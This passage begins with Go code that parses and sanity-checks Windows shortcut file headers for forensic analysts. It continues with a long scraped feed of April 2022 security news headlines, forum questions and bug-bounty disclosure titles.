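	swShowNormal      uint32 = 0x1
	swShowMaximized   uint32 = 0x3
	swShowMinNoActive uint32 = 0x7
)

type ShellLinkHeader struct {
	LinkFlags      uint32
	FileAttributes uint32
	FileSize       uint32
	IconIndex      int32
	ShowCommand    uint32
	HotKey         uint16
}

// ParseShellLinkHeader validates the fixed header and returns it with a list
// of analyst-facing findings. Hard format violations are returned as errors;
// unusual-but-legal values are returned as findings.
func ParseShellLinkHeader(b []byte) (ShellLinkHeader, []string, error) {
	var h ShellLinkHeader
	if len(b) < shellLinkHeaderSize {
		return h, nil, errors.New("input shorter than a ShellLinkHeader")
	}
	if size := binary.LittleEndian.Uint32(b[0:4]); size != shellLinkHeaderSize {
		return h, nil, fmt.Errorf("HeaderSize is 0x%X, expected 0x4C", size)
	}
	if !bytes.Equal(b[4:20], linkCLSID) {
		return h, nil, errors.New("LinkCLSID is not the shell link CLSID")
	}
	h.LinkFlags = binary.LittleEndian.Uint32(b[20:24])
	h.FileAttributes = binary.LittleEndian.Uint32(b[24:28])
	// b[28:52] holds CreationTime, AccessTime, WriteTime (one FILETIME each).
	h.FileSize = binary.LittleEndian.Uint32(b[52:56])
	h.IconIndex = int32(binary.LittleEndian.Uint32(b[56:60]))
	h.ShowCommand = binary.LittleEndian.Uint32(b[60:64])
	h.HotKey = binary.LittleEndian.Uint16(b[64:66])
	reserved := b[66:76] // Reserved1 (2) + Reserved2 (4) + Reserved3 (4): MUST be zero

	var findings []string
	if !bytes.Equal(reserved, make([]byte, 10)) {
		findings = append(findings, "reserved header bytes are non-zero (spec says MUST be zero)")
	}
	switch h.ShowCommand {
	case swShowNormal, swShowMaximized:
	case swShowMinNoActive:
		findings = append(findings, "ShowCommand=SW_SHOWMINNOACTIVE: target starts minimized and without focus")
	default:
		findings = append(findings, fmt.Sprintf("ShowCommand=0x%X is not a spec-listed value", h.ShowCommand))
	}
	if h.LinkFlags&flagHasArguments != 0 {
		findings = append(findings, "HasArguments set: a command line follows the header; inspect it")
	}
	if h.LinkFlags&(flagHasLinkTargetIDList|flagHasLinkInfo) == 0 {
		findings = append(findings, "neither HasLinkTargetIDList nor HasLinkInfo set: no conventional target")
	}
	return h, findings, nil
}

// buildSampleHeader constructs a minimal header for demonstration (constructed
// sample data, not taken from a real shortcut).
func buildSampleHeader(flags, showCmd uint32) []byte {
	b := make([]byte, shellLinkHeaderSize)
	binary.LittleEndian.PutUint32(b[0:4], shellLinkHeaderSize)
	copy(b[4:20], linkCLSID)
	binary.LittleEndian.PutUint32(b[20:24], flags)
	binary.LittleEndian.PutUint32(b[24:28], 0x20) // FILE_ATTRIBUTE_ARCHIVE
	binary.LittleEndian.PutUint32(b[60:64], showCmd)
	return b
}

func main() {
	for _, sample := range [][]byte{
		buildSampleHeader(flagHasLinkTargetIDList|flagHasLinkInfo|flagIsUnicode, swShowNormal),
		buildSampleHeader(flagHasArguments|flagIsUnicode, swShowMinNoActive),
	} {
		h, findings, err := ParseShellLinkHeader(sample)
		fmt.Printf("flags=0x%X show=%d err=%v findings=%q\n", h.LinkFlags, h.ShowCommand, err, findings)
	}
}
```

    The header is only the first structure in the file; the variable-length LinkTargetIDList, LinkInfo, StringData (where the arguments live) and ExtraData blocks follow it and need their own parsers.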

  • Open

    Trying to carve Office documents but they always open corrupted, Help pls
    submitted by /u/KTthemajicgoat [link] [comments]
    Quantum ransomware analysis
    New week, new report! This time me, 0xtornado and svch0st collaborated on a #QuantumRansomware compromise. ➡️ ISO file ➡️ PsExec ➡️ *attacker hostname* TERZITERZI ➡️ much more! https://thedfirreport.com/2022/04/25/quantum-ransomware/ submitted by /u/samaritan_o [link] [comments]
    Extract Bitlocker Clear Key?
    Hi, I’ve got 2 BitLocker-encrypted drives on which BitLocker itself is disabled, so there must be a Clear Key stored on the drive. I can access the data with Magnet Axiom, which auto-discovered the key, but I want to run some other examinations with other tools on it. So my question is: does anybody know where exactly the Clear Key is stored? Thanks for any help submitted by /u/kaibring [link] [comments]
  • Open

    Local file disclosure through SSRF at next.nutanix.com
    Nutanix disclosed a bug submitted by tosun: https://hackerone.com/reports/471520
    Force User to Accept Attacker's invite [ Restrict user to create account]
    Krisp disclosed a bug submitted by sammam: https://hackerone.com/reports/1420070 - Bounty: $100
    Visibility Robots.txt file
    Krisp disclosed a bug submitted by razahack: https://hackerone.com/reports/1450014
    Xss triggered in Your-store.myshopify.com/myshopify.com/admin/apps/shopify-email/editor/****
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1472471 - Bounty: $2900
    CURLOPT_SSH_HOST_PUBLIC_KEY_SHA256 comparison disaster
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1549435
    CURLOPT_SSH_HOST_PUBLIC_KEY_MD5 bypass if string not 32 chars
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1549461
  • Open

    ClusterFuzz is a scalable fuzzing infrastructure
    Article URL: https://github.com/google/clusterfuzz Comments URL: https://news.ycombinator.com/item?id=31160965 Points: 2 # Comments: 0
  • Open

    What are you doing wrong when you fail at bug bounties?
    Hi all, I hope all is well. I have 3+ years bug bounty experience so I want to talk about the common mistakes when doing bug bounty… Continue reading on Medium »
    Open-Redirects
    Most of time you have seen that when you go to a website and try to access some page which require a user to login first, it redirects you… Continue reading on Medium »
    The time I hacked a Fortune 500 company, but it was out of scope.
    Hi :) thanks for taking some time to read my blog post. This is a short post about a bug I found during my testing of a Fortune 500… Continue reading on Medium »
    Improper cookie not expiring after logged out!
    Hey folks! I’m Mujibur Rahman from Chennai and I’m a security researcher. Continue reading on Medium »
    fuzzing and credentials leakage..nice bug hunting writeup
    Here you find a beautiful write-up with useful tips :) Continue reading on Medium »
    Unlock any blur text/picture without membership/subscription on Scribd.com |By Neuchi
    Hi, I’m Neil Harvey Miñano. 5 days ago I found a vulnerability on scribd.com while searching for a Google SQLi dork. Continue reading on System Weakness »
  • Open

    HOW TO ENCRYPT FILE SYSTEM IN RHEL 8
    Hi, I seek your counsel on a way to encrypt a file system partition (i.e. /encrypted_data) containing sensitive .txt data files, with RBAC on top to allow only application users to access those files; admin access should be restricted, with the objective of complying with PCI-DSS. Steps are available for that on AIX using efskeymgr; however, I’m looking for similar steps for Linux. http://www.asgaur.com/wp/how-to-encrypt-file-system-in-aix/ Thank you, submitted by /u/Sparthans [link] [comments]
    Looking for resources on industry best practices
    I'm looking for resources for learning about Industry best practices for correcting/dealing with typical vulnerability classes. Blogs, whitepapers, YouTube channels, whatever you find helpful would be much appreciated. This came up as recommended knowledge for an interview for a Product Security Engineer position. This would be primarily dealing with web apps but I'm open for infrastructure security as well. Thanks in advance!!! submitted by /u/rbl00 [link] [comments]
    Help understanding facebook account hijacking?
    I am not looking for advice, just information. Obviously there are multiple motives for hijacking a Facebook account. Specifically I am curious about its use for anonymity. I imagine it could be used in a similar way as someone might use someone’s offline identity and/or credit cards to cover their tracks. My friend’s account got hijacked by a random and it appears to be being used for foreign political propaganda. Is it easier to hijack an account than make an anonymous one? At least one that would be difficult for local law enforcement or something to trace? Would it circumvent something, make them harder to find? What would be or likely be the benefits/motive for doing it this way? I feel like there’s more to this than that I’m not seeing and I’m curious. submitted by /u/fright_end [link] [comments]
  • Open

    Static unpacker and decoder for Hello Kitty Packer
    submitted by /u/GelosSnake [link] [comments]
  • Open

    War in Ukraine / April 24
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Incognito 3.0 OSINT Writeups
    1. ICTF Continue reading on Medium »
  • Open

    SecWiki News 2022-04-25 Review
    SecWiki Weekly (Issue 425) by ourren; Building and evolving Software Composition Analysis (SCA) capabilities by ourren. For more of the latest articles, visit SecWiki
  • Open

    Facebook’s big vulnerability
    Article URL: https://thebucketreport.com/video/facebooks-big-vulnerability Comments URL: https://news.ycombinator.com/item?id=31155935 Points: 35 # Comments: 79
    Vulnerability of avian populations to renewable energy production
    Article URL: https://royalsocietypublishing.org/doi/10.1098/rsos.211558 Comments URL: https://news.ycombinator.com/item?id=31155272 Points: 1 # Comments: 0
  • Open

    Dreaming While Awake
    Interview with Professional Social Engineer — Jenny Radcliffe! Continue reading on ILLUMINATION »
  • Open

    Defeating BazarLoader Anti-Analysis Techniques
    Anti-analysis techniques make it harder for malware analysts to do their work. We cover BazarLoader anti-analysis techniques and how to defeat them. The post Defeating BazarLoader Anti-Analysis Techniques appeared first on Unit42.
  • Open

    Central Cyberspace Affairs Office and two other departments issue the “Work Arrangements for Deepening Large-Scale IPv6 Deployment and Application in 2022”
    By the end of 2022, the number of IoT IPv6 connections is to reach 180 million, the share of IPv6 traffic on fixed networks 13%, and on mobile networks 45%.
    Google Project Zero report discloses global trends in 0-day exploitation in 2021
    In 2021, Google detected and disclosed 58 in-the-wild 0-day vulnerabilities, a record since the project was founded in 2014.
    Through the Hack DHS program, 122 security vulnerabilities found in US Department of Homeland Security systems
    Bounty hunters participating in the “Hack DHS” bug bounty program have found 122 security vulnerabilities in the Department of Homeland Security’s external systems.
    Comprehensive collection of 2021 cyber and data security laws, policies, national standards and reports
    This article comprehensively organizes China’s 2021 security-related policies, regulations and industry reports for reference by industry practitioners.
    FreeBuf Morning Report | Anonymous has leaked a cumulative 5.8 TB of Russian data; security vulnerabilities grow at a record pace
    Since declaring cyber war on Russia, Anonymous has now published roughly 5.8 TB of Russian data.
    Re-examining the value of threat intelligence in light of the European supercomputer hacks
    Not long ago, supercomputers in several European countries saw an unprecedentedly large “cryptomining” storm.
    Atlassian fixes a critical Jira authentication bypass vulnerability
    Threat actors can trigger the vulnerability by sending specially crafted HTTP requests to vulnerable software.
    PoC code for Java cryptography vulnerability published; affected versions should upgrade promptly
    The vulnerability has been fixed, but since PoC code is now public, affected versions need to be patched promptly to prevent exploitation.
    Since declaring war on Russia, Anonymous has leaked a cumulative 5.8 TB of data
    Since Anonymous declared cyber war on Russia, it has published about 5.8 TB of Russian data.
    Costa Rica’s national finance systems hit by ransomware: tax and customs at a standstill
    The Central American country Costa Rica was hit by a Conti ransomware attack; many systems across multiple ministries were paralyzed and a large amount of sensitive data was stolen.
    Practical network log correlation analysis on the OSSIM platform
    This article briefly introduces network log correlation analysis techniques on the OSSIM platform, in the hope of being helpful.
  • Open

    Beginners Guide to 0day/CVE AppSec Research
    Article URL: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html Comments URL: https://news.ycombinator.com/item?id=31152385 Points: 2 # Comments: 0
  • Open

    Bypass the Docker Firewall by Abusing REST API
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Tons of gifs and jpegs of Tolkien from Silmarillion and Lord of the Rings
    submitted by /u/FireHole [link] [comments]
  • Open

    [Translation] BPF ring buffer: use cases, core design and example programs (2020)
    Translator’s preface: This article is a translation of a 2020 piece by BPF core developer Andrii Nakryiko: BPF ring buffer. It explains the problems the BPF ring buffer solves and the design behind it, and gives code examples and links to kernel patches; with both depth and breadth, it is an excellent reference for learning the ring buffer. Given the translator’s limited ability, omissions or errors may remain; if in doubt, consult the original. The translation follows. Contents: Translator’s preface; 1 Improvements of ringbuf over perfbuf: 1.1 Lower memory overhead, 1.2 Guaranteed event ordering, 1.3 Less wasted data copying; 2 ringbuf use cases and performance: 2.1 Typical scenarios, 2.2 High-throughput scenarios, 2.3 Non-maskable interrupt (NMI) scenarios, 2.4 Summary; 3 Example programs (show me the code): 3.1 perfbuf example (kernel BPF program, user-space program), 3.2 ringbuf example (kernel BPF program, user-space program), 3.3 ringbuf reserve/commit API example (principle, limitations, kernel BPF program, user-space program); 4 ringbuf event notification control: 4.1 Notification overhead, 4.2 How perfbuf handles it, 4.3 How ringbuf handles it; 5 Conclusion. In many scenarios, BPF programs need to send data to user space. The BPF perf buffer (perfbuf) is currently the de facto standard for this, but it has some problems, such as wasted memory (because of its per-CPU design) and no guarantee of event ordering. As an improvement, kernel 5.8 introduced a new BPF data structure: the BPF ring buf…

  • Open

    Hosting for video game servers?
    http://zsr.site.nfoservers.com/ submitted by /u/n0stal6ic [link] [comments]
  • Open

    Methods for bypassing Windows Defender in Red Team operations
    Hello. In this piece we will touch on some command lines for how to get rid of Windows Defender. Let’s go. Continue reading on Medium »
  • Open

    Secret from HackTheBox — Detailed Walkthrough
    No content preview
    THM: Raz0rBlack
    No content preview
    How to perform a basic SQL Injection Attack? — Ethical Hacking
    No content preview
  • Open

    --libcurl code injection via trigraphs
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1548535
  • Open

    Shared folder accessed by unauthorized third party?
    Windows 10. A shared external hard drive on my network was making continuous noises as if it were reading/writing large amounts of data. The noises would stop the second I moved my mouse and started using my machine. This happened on at least 2 occasions. I was pretty suspicious of this, and went and realized I had forgotten to make the hard drive unshared. I had previously shared it so I could back up files from my laptop before formatting. When I attempted to make the drive unshared, it said a user was connected to it, and asked if I was sure I wanted to make it unshared while a user was connected. This spooked me quite a bit. My main questions: Is it possible it was talking about my laptop? Are there legitimate Windows 10 processes that can cause a hard drive to make read/write noises when the computer is not in use? submitted by /u/Exact_Frosting_1197 [link] [comments]
    Clone gmail logged in google chrome browser to another laptop
    Is there any way to clone a Gmail session logged in to the Google Chrome browser to another laptop? Ex: User A is logged in to Gmail on Google Chrome using Laptop1. User B wants to clone User A’s Chrome with his Gmail login to Laptop2. Please suggest any way? Note: User B has all the access to User A’s Laptop1 submitted by /u/hasitha1989 [link] [comments]
  • Open

    Process Herpaderping (Mitre:T1055)
    Introduction Johnny Shaw demonstrated a defense evasion technique known as process herpaderping in which an attacker is able to inject malicious code into the mapped The post Process Herpaderping (Mitre:T1055) appeared first on Hacking Articles.
  • Open

    War in Ukraine / April 23
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    10 search engines you haven’t heard of
    Little-known search engines for OSINTers and journalists: they find what Google can’t. An overview of the 10 best anonymous search engines. Continue reading on KR. LABORATORIES IT BLOG »
    Midnight Flag CTF 2022 — OSINT Write-up
    On the night of April 23 to 24, 2022, the Midnight Flag “Infektion” CTF took place, organized by the students of ESNA (home page… Continue reading on Medium »
    WHAT INTERDISCIPLINARY PATHS TOWARD A GENERAL THEORY OF OSINT?
    For almost two decades now I have argued that OSINT, understood as a discipline, deserves a robust, reliable, well… theoretical construct. Continue reading on Medium »
    SPY NEWS: 2022 — Week 16
    Summary of the espionage-related news stories for the Week 16 (17–23 April) of 2022. Continue reading on Medium »
  • Open

    EvtxHussar 1.0
    Hi, I recently wrote a tool in Golang which will help me in my forensics work by dumping the most common Event IDs from various Windows Event logs (PowerShell, Security, System etc.). Events are highly configurable as they are placed in external YAML files. It differentiates logs by the Computer field of the last event in the .evtx file, so extra logs from VSS, Archive and backups can be included easily. The project is based on the evtx library used in Velociraptor. Link to tool: https://github.com/yarox24/EvtxHussar Current categories supported: PowerShell (including ScriptBlock reconstruction); Account related modifications; Audit log cleared; Process creation (including Sysmon); Scheduled Tasks (including extra parsing of XML Content if present) - Creation/Modification and Execution; Services. In future I plan to add YAML definitions for: Logon events (Yes, this one is important); RDP events; WinRM events; and others. Output formats: Excel (Default), CSV, JSON, JSONL. Maybe it will be useful for some of you submitted by /u/Yarox45 [link] [comments]
    svchost.exe without '-k': is this malware?
    Hello, I did some log investigations in Azure Sentinel and found this process. In a YouTube video I saw that an svchost.exe process without '-k' is something suspicious. How can I investigate this without access to the VM? Folder path is C:\Windows\System32. Things on cloud are different from on-premise in my opinion. Thanks. submitted by /u/Agent_B99 [link] [comments]
    Crawl through directories when exporting to CSV in autopsy
    So, I'm examining a system that has several folders within folders whose files I would like to export to CSV. Rather than exporting the items in each folder individually, is there a way to crawl through directories to export the info of all files contained in each folder? submitted by /u/roku77 [link] [comments]
    Any options for Samsung T7 touch SSD?
    I have an encrypted Samsung T7 touch external hard drive to process. I have access to most forensic tools. What would be the best option or is it hopeless. (AES 256)? submitted by /u/james1234cb [link] [comments]
  • Open

    SecWiki News 2022-04-24 Review
    Analysis of 0-day exploitation in 2021 by ourren; Enterprise security: a brief discussion of red-blue confrontation (part 2) by ourren; Enterprise security: a brief discussion of red-blue confrontation (part 1) by ourren; “VirusTotal 2021 Annual Malware Trends Report” by Avenger. For more of the latest articles, visit SecWiki
  • Open

    AppSec tales III — Password Recovery
    Application Security Testing of the Password Recovery form guidelines. Continue reading on Medium »
    Redis Exploit Tool
    This tool is for personal safety research study only. Continue reading on Medium »
    Mobile Security Framework (MobSF) Setup — Kali Linux and Windows
    Hello Everyone.. I will explain installation steps of MobSF framework in Kali Linux and Windows OS in this blog. Continue reading on Medium »
  • Open

    “Precisely” grasping static analysis | Keen Lab’s automated static vulnerability detection tool for binaries is officially open-sourced
    Author: Tencent Keen Security Lab. Original link: https://mp.weixin.qq.com/s/x6jNNvkWRJt1YcHMakWHEg Introduction: To improve the efficiency and scalability of static analysis for vulnerability detection in binaries, Keen Lab incubated and open-sourced the binary static vulnerability analysis tool BinAbsInspector. Repository: https://github.com/KeenSecurityLab/BinAbsInspector Background: Soft...
    The More You Know, The More You Know You Don’t Know: a review of 0-days exploited in the wild in 2021
    Author: Maddie Stone@Google Project Zero. Translator: Knownsec 404 Lab translation team. Original link: https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html This is our third annual review of 0-days exploited in the wild [2020, 2019]. Each year we review...
  • Open

    Pwn2Own 2022 Miami concludes; last spring’s champion retains Master of Pwn
    Champion in both 2021 and 2022
    FreeBuf Morning Report | Conti claims responsibility for the attack on Costa Rica; Wawa sues Mastercard
    QNAP firmware update fixes the Apache HTTP vulnerability in its NAS.
    Join the “Zero Trust Security Forum” on May 19 for an online discussion of security
    As cyber threats diversify, the traditional security perimeter can no longer meet the protection needs of enterprise remote work.
    Lapsus$ hacking group breached T-Mobile’s internal systems
    T-Mobile confirmed that the Lapsus$ extortion gang breached its network “several weeks ago” using stolen credentials and gained access to internal systems.
    Cryptomining malware sets its sights on Docker servers
    The Lemon_Duck botnet operators are running a Monero cryptomining campaign, with the Docker API as their main attack target.
    US government grants $12 million to six universities to develop cyber attack-and-defense tools
    The US Department of Energy (DOE) announced it will provide $12 million to six university teams to develop cyber attack-and-defense tools to protect US energy delivery systems from cyberattacks.
    US declares web scraping legal; a trillion-scale army of crawlers stirs beneath the surface
    With internet competition heating up, competition over online assets is bound to intensify; crawler attacks have become the primary threat to enterprises’ online assets.
    How to choose the best encryption method for a database
    Encryption is the universal process for keeping data secure. In this article we explore different encryption methods so you can store information securely in a database.
  • Open

    Profiling a Personal Portfolio of Personal Photos and Security Event Conference Photos - A Compilation
    Folks, who's on Facebook? Feel free to send me an invitation request and let's catch up. The following photos are a personal Facebook photos compilation which you can feel free to go through in terms of catching up on what I've been up to.
  • Open

    FREE ICS related CTF presented by CISA
    submitted by /u/1winway [link] [comments]
  • Open

    Atlassian fixes critical Jira authentication bypass vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-0540 Comments URL: https://news.ycombinator.com/item?id=31140284 Points: 2 # Comments: 0

  • Open

    Super easy manipulation Led to full NFT control
    First of all, i’ll not disclose any information about this Web3 project; I’ll just give an example of what has already been done . Continue reading on NetworkingSec »
    Super easy manipulation Led to full NFT control
    First of all, i’ll not disclose any information about this Web3 project; I’ll just give an example of what has already been done . Continue reading on Medium »
    Beginner’s Guide of Bug Bounty By Arth Bajpai
    Hello Everyone I was thinking about writing something, So I thought why not on the most asked question which is how to start in bug… Continue reading on Medium »
    How I Got Swag From Race Condition
    Hello All, Hope you are having a great time! I am Moin Khokhar Aka Silentknight.bug This Is My First Time Please Forgive Me if Any Grammar… Continue reading on Medium »
    HOW I GAINED ACCESS TO THE DATABASE INFORMATION OF A LARGE UNIVERSITY.
    WORDPRESS VULNERABILITY. Continue reading on Medium »
    How I got Apple Hall Of Fame !
    Continue reading on Medium »
    Walkthrough of “Insecure Deserialization”- PentesterAcademy
    Hello all, This Blog will provide a walkthrough of “Insecure Deserialization Lab” by PentesterAcademy. Continue reading on Medium »
  • Open

    Bluetooth vulnerability in smart Covid test patched, the second to do so
    Article URL: https://www.scmagazine.com/analysis/device-security/bluetooth-vulnerability-in-smart-covid-test-patched-the-second-to-do-so Comments URL: https://news.ycombinator.com/item?id=31136445 Points: 3 # Comments: 0
    Psychic Signatures (Java Vulnerability)
    Article URL: https://www.youtube.com/watch?v=502iGDxuiRk Comments URL: https://news.ycombinator.com/item?id=31130598 Points: 1 # Comments: 0
  • Open

    Renderers can obtain access to random bluetooth device without permission
    Internet Bug Bounty disclosed a bug submitted by palmeral: https://hackerone.com/reports/1519099 - Bounty: $480
    Attacker can bypass authentication build on ingress external auth (`nginx.ingress.kubernetes.io/auth-url`)
    Kubernetes disclosed a bug submitted by thisbug: https://hackerone.com/reports/1357948 - Bounty: $500
  • Open

    Writing a zero findings pentest report
    submitted by /u/DiabloHorn [link] [comments]
    Are vulnerability scores misleading you? Understanding CVSS severity and using them effectively
    submitted by /u/MiguelHzBz [link] [comments]
    Cliam: better cloud agnostic IAM permissions enumerator. Covers AWS and GCP, but more to come!
    submitted by /u/securisec [link] [comments]
  • Open

    Email OSINT
    Today I will talk about sources designed to identify the identities of the owners of email addresses in the framework of OSINT research… Continue reading on Medium »
    War in Ukraine / April 22
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Services for checking and monitoring websites and servers
    A collection of online services for checking, monitoring and maintaining hosts: sites, domains, servers. Monitoring of electronic resources. Continue reading on KR. LABORATORIES IT BLOG »
    Will AI swallow up OSINT?
    From a forecasting perspective… a more than legitimate question. Continue reading on Medium »
    What is there for automated detection of deepfakes?
    Fake Profile Detector (Deepfake, GAN) — this AI model only works on StyleGAN images used to create fake human faces of people that don’t… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-23 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    Problems galore: a roundup of Tesla’s recent “cybersecurity incidents”
    Recently, controversies over Tesla’s data handling, and even incidents of its systems being hacked or leaking data, have occurred from time to time. This article reviews the “cybersecurity incidents” Tesla has encountered, both in China and abroad.
  • Open

    Offensive con 2022 Talks
    submitted by /u/dmchell [link] [comments]
  • Open

    What else can I be doing to bolster my resume and increase my chances of breaking into the field after I graduate?
    Hello, I am 75% completed with my Bachelors in Cybersecurity and I am trying to do everything I possibly can to break into the field when I graduate. I have lurked the cybersecurity subreddits heavily and have picked up a lot of the general advice. I have obtained my A+, Net+, and Sec+. I have started a homelab and have been doing various exercises within it to get my hands on as many different programs/tools/operating systems/etc as I can. I am learning Python and have made a Github account where I have posted a few basic scripts I have made and will continue to post more as I keep practicing. I have participated in numerous CTFs both small and on the national scale and have placed well in some of them and added them to my LinkedIn. I have started a blog and have been posting just general writeups and blog posts of CTFs or whatever I'm doing within Cybersec at the time. I am working through TryHackMe and have been able to manage a few boxes on HackTheBox. I am sending out resumes to try and find an internship, but I don't seem to be having luck in other states and the state I am in is atrocious for jobs. I plan on leaving forever once I graduate. What else can I be doing to make my resume look good? I'm much more talented at the Blue team side (Packet/Log Analysis, Steg, etc) when I do CTFs, but have a greater interest in red team. I have been eyeing both the Security Blue Team Level 1 and TCM Security's new PNPT cert. They are both relatively cheap and seem like extremely good knowledge that would help me in an interview. submitted by /u/BTBricktop [link] [comments]
    Network still trying to connect to kaspersky labs even though uninstalled
    Edit: I solved this (credits to the Sophos UTM Forum, by Jay Jay). It's from my Sophos firewall. I added Kaspersky in my network definition. My router is trying to resolve the domain, while my Pi-hole is blocking it. I removed the network definition entry and the queries stopped. Thanks to all those who helped. Hello, this may be the better subreddit to ask this. I uninstalled Kaspersky a few months ago from 2 of my computers (PC and Surface Pro) for obvious reasons. I used Revo Uninstaller Pro so it also scans the registry and deletes some remnants of it. I still notice in my Pi-hole logs that it keeps trying to connect to it (I blocked it). It is my top blocked domain. How can I trace whatever it is that is trying to connect to Kaspersky Labs on my PC and remove it? Thanks. Edit: I have powered off my PC (switched off from the power supply), unplugged my ethernet cable, force shut down my Surface Pro using the cmd /s /f /t 0 option and put it outside wifi range in my car, and I still get queries every minute. I'll try Wireshark to see where the request is coming from and update. submitted by /u/eijisawakita [link] [comments]

  • Open

    Starting a Career
    I passed my OSCP a few months ago. Is that really enough to begin a career? I understand it's literally the floor for expectations (being able to use Google, and a general idea of report writing) but it really doesn't feel like it. It sounds insane but I haven't even applied yet for a job because of the absolutely astounding work I've seen online by fellow infosec enthusiasts. It's a high bar of expectation that I doubt I'd be able to fulfill, even if the "actual" job's probably more akin to sending out emails about password policies. submitted by /u/smol-dumb-and-gay [link] [comments]
    I'm Looking for a Honeypot for Threat Intel
    Thinking about renting a VPS for Threat Intel and possibly IOCs. No Web, just SSH and maybe with an up-to-date Vuln Library. What's your go-to Honeypot? submitted by /u/No_Bumblebee_5793 [link] [comments]
    How to purge emails from Cloud Exchange (E3 license, E5 security)
    Hi All, Recently ran into an issue where someone sent an internal email with information they shouldn't have. Typically, to purge these emails I would use KnowBe4 or Office365's Security and Compliance: eDiscovery. We've used both methods but this was a way larger scale and there are still emails floating around. Some people responded to it or forwarded it. Let's pretend the title was "ABC". We have three subjects then: "ABC", "RE: ABC", "FW: ABC". We've searched these subjects in eDiscovery and purged the results. It's still not pulling everything as they are still in people's mailboxes. Meaning... those exact subject lines are still being found in users' inboxes. Office365's Security and Compliance: eDiscovery: Search is done through here, which gets a collection of emails. We then purge those via PowerShell. Stuck here as there are plenty still around. Anybody have tools in E5 security they use for this? submitted by /u/compguyguy [link] [comments]
    How is this possible? If your accounts/devices are “taken over” is it possible that you can see the persons browsing history? Also could you see some of their iCloud downloads in your file folder and possibly pics?
    I am seeing business-related websites, sale boosting, and had a random picture show up when I was adding a new widget. submitted by /u/00miagv00 [link] [comments]
    How do you stay secure?
    Hey, everyone. So I know that there are subs for VPNs, password managers and such. But the information over there is either people arguing that the VPN they use is the best or just shills for NordVPN, Express, etc. So I thought (and hopefully it is okay) I'd ask some actual security experts what you do to stay private and secure? If it's allowed, what VPNs or password managers do you use? Or do you use proxies? Or do you not use anything at all? Encrypted email? Any top-of-the-line antivirus software? Or just having the knowledge of not being dumb on the internet? Are all of these privacy clients even worth it? I know that the first and foremost course of action is having some sense when it comes to the internet; i.e. not clicking on suspicious links, not downloading random files, etc. But I would assume these programs have their pros, right? I am getting into the cyber security world and there are just SO many companies out there so I just thought I would ask some people who actually are in this field. I hope that is okay! Thanks submitted by /u/strings_on_a_hoodie [link] [comments]
    Average lifetime of an IoC
    Hello threat analyst stranger, for you, and based on your experience, what is the average lifetime for an IoC? The goal here is to automate the IoC requalification. When should I requalify my IoCs :) I would say: Hash: 10 days; Domain: 1 month; IP: 5 months. Thank you! submitted by /u/Immediate-Sentence-4 [link] [comments]
    Can an ISP see what browser you’re using and do they see your browsing history or traffic any differently whether you’re using Chrome or Firefox?
    Can an ISP see what browser you’re using and do they see your browsing history or traffic any differently whether you’re using Chrome or Firefox? submitted by /u/Available-Fly7541 [link] [comments]
    About information on security news
    Hello, I'm a newb who is studying security. I'm looking for a blog or page about security, so is there anyone who can share one? I like the latest security news, OSINT and search engines, and articles about vulnerabilities, which I'm most interested in. I'm writing here because I want to hear a lot of news and information. submitted by /u/Alexiosplana [link] [comments]
    Computer Recognition Authentication
    I'm interested in this form of authentication, but can't seem to find a heck of a lot about it. Can anyone point me in the right direction to learn more? submitted by /u/ahpto [link] [comments]
  • Open

    Mainly memes; some OSTs and bass boosted songs (many memes are NSFW)
    https://dl.abstract.land/ submitted by /u/steamsy_ [link] [comments]
  • Open

    GEO-LOCATION WITHOUT STREET VIEW
    This might be coming out late, but hey better be late than never. Continue reading on Osintfun »
    War in Ukraine / April 21
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    WHAT IS THE I-SPHERE
    Ideas, values and content for disciplinary innovation in Open and Original Source Intelligence. Continue reading on Medium »
    Finding Luther — An OSINT Geo location Challenge.
    London was an amazing terrain to do GEOINT. Its intricate small roads in between the buildings made it more complex & beautiful. To my… Continue reading on Medium »
  • Open

    A Detailed Guide on Hydra
    Hello! Pentesters, this article is about a brute-forcing tool Hydra. Hydra is one of the favourite tools of security researchers and consultants. Being an excellent The post A Detailed Guide on Hydra appeared first on Hacking Articles.
  • Open

    Any CREST CPIA guidance for help?
    Hello guys, I decided to take the CPIA exam; however, other than the syllabus CREST recommends, I can't find any other extra information. I am really interested in the forensic pathway, but there is really little guidance or advice I can refer to. :( submitted by /u/NoIdeaForMyFuture [link] [comments]
    M.2 Drive
    Can you create an image of an M.2 drive? Is the process the same as any other HDD or are there any restrictions? submitted by /u/Beep-Boop-Bop-Boop [link] [comments]
    Encase problem in question
    submitted by /u/Metriczcaptian88 [link] [comments]
  • Open

    No Hardware, No Problem: Emulation and Exploitation
    submitted by /u/0xdea [link] [comments]
    The Illustrated QUIC Connection
    submitted by /u/syncsynchalt [link] [comments]
    WSO2 RCE (CVE-2022-29464) exploit and writeup
    submitted by /u/0xdea [link] [comments]
    Hardware Security Talks Announced! Hardwear.io
    submitted by /u/hardweario [link] [comments]
    Abusing Azure Container Registry Tasks from Specter-Ops
    submitted by /u/gdraperi [link] [comments]
    Null ECDSA Signatures - Proof of concept for bypassing JWT signature checks using CVE-2022-21449
    submitted by /u/thorn42 [link] [comments]
    Smashing the Modern Web Tech Stack — Part 1: The Evolving Threat Landscape in 2022 and DOM-based XSS in Cloud-Native React Apps
    submitted by /u/MalwareJoe [link] [comments]
  • Open

    Removing the Stigma of a CVE
    Article URL: https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/ Comments URL: https://news.ycombinator.com/item?id=31123900 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-04-22 Review
    TheRoadOfSO: notes on learning security operations by ourren. For more of the latest articles, visit SecWiki
  • Open

    CSS Transition-based ontransitionend XSS
